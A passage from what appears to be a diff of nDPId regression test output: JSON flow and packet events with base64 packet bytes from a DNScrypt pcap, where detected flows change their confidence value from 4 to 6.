AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":57636,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":57636,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":345,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318038} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":345,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAABQ+3YAub0RyxAKAAABl1DeTwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":38511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAAIc+3dAAL0RifwKAAABl1DeT5ZvAbsCCDh2XC4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAEAAAAAAAAAAAABwwAMAb8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":38511,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":38511,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":946739318059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739318059,"pkt":"ZmZmZmZmRERERERECABFAADX+4ZAADQRFDOXUN5PCgAAAQG70nQAw+UcXDKBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":946739318059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739318059,"pkt":"ZmZmZmZmRERERERECABFAADX+4dAADQRFDKXUN5PCgAAAQG7sbkAwwXbXC+BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":59011,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAIcXchAAL0RQhgKAAABjgTNL+aDAbsCCB4KqlwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":59011,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":59011,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":50387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAXcXckgAL0RXlcKAAABjgTNL8TTAbsGBCE2qlkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":50387,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":50387,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":40138,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAIcXcpAAL0RQhYKAAABjgTNL5zKAbsCCB4KqloBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":40138,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":40138,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":352,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318061} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":352,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAABQXckAub0RgyoKAAABjgTNLwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":51935,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAXcXcsgAL0RXlUKAAABjgTNL8rfAbsGBBssqlcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA